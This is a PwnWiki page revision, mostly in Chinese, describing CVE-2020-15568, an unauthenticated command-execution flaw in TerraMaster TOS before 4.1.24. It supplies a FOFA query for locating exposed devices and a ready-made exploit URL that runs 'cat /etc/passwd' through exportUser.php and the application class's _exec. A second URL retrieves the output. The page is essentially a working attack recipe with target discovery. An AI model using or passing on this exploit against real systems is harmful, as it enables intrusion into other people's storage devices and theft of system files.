Difference between revisions of "CVE-2020-15568 TerraMaster TOS exportUser.php 遠程命令執行漏洞"

From PwnWiki
(Created page with "<languages /> <translate> ==漏洞影響== </translate> <pre> TerraMaster TOS < 4.1.24 </pre> ==FOFA== <pre> "TerraMaster" && header="TOS" </pre> <translate> ==漏洞利用=...")
 
(Marked this version for translation)
 
Line 1: Line 1:
 
<languages />
 
<languages />
 
<translate>
 
<translate>
==漏洞影響==
+
==漏洞影響== <!--T:1-->
 
</translate>
 
</translate>
 
<pre>
 
<pre>
Line 13: Line 13:
  
 
<translate>
 
<translate>
==漏洞利用==
+
==漏洞利用== <!--T:2-->
 
</translate>
 
</translate>
  
 
<translate>
 
<translate>
 +
<!--T:3-->
 
在其他文件的代碼檢查期間,也發現有一種方法可以利用TOS軟件中預先存在的類來利用此問題。位於<code>include/class/application.class.php</code>中的PHP類是在運行TOS軟件的設備上執行命令的最佳人選。
 
在其他文件的代碼檢查期間,也發現有一種方法可以利用TOS軟件中預先存在的類來利用此問題。位於<code>include/class/application.class.php</code>中的PHP類是在運行TOS軟件的設備上執行命令的最佳人選。
  
 +
<!--T:4-->
 
由於exportUser.php沒有身份驗證控件,因此未經身份驗證的攻擊者有可能通過提供以下值作為HTTP GET參數來實現代碼執行。
 
由於exportUser.php沒有身份驗證控件,因此未經身份驗證的攻擊者有可能通過提供以下值作為HTTP GET參數來實現代碼執行。
 
</translate>
 
</translate>
Line 28: Line 30:
  
 
<translate>
 
<translate>
 +
<!--T:5-->
 
返回200後再次訪問
 
返回200後再次訪問
 
</translate>
 
</translate>
Line 36: Line 39:
  
 
<translate>
 
<translate>
==參考==
+
==參考== <!--T:6-->
 
</translate>
 
</translate>
 
https://short.pwnwiki.org/?c=0s3FRY
 
https://short.pwnwiki.org/?c=0s3FRY

Latest revision as of 14:36, 9 June 2021

Other languages:
Chinese

漏洞影響

TerraMaster TOS < 4.1.24

FOFA

"TerraMaster" && header="TOS"

漏洞利用

在其他文件的代碼檢查期間,也發現有一種方法可以利用TOS軟件中預先存在的類來利用此問題。位於include/class/application.class.php中的PHP類是在運行TOS軟件的設備上執行命令的最佳人選。

由於exportUser.php沒有身份驗證控件,因此未經身份驗證的攻擊者有可能通過提供以下值作為HTTP GET參數來實現代碼執行。

http://xxx.xxx.xxx.xxx/include/exportUser.php?type=3&cla=application&func=_exec&opt=(cat%20/etc/passwd)>test.txt


返回200後再次訪問

http://xxx.xxx.xxx.xxx/include/test.txt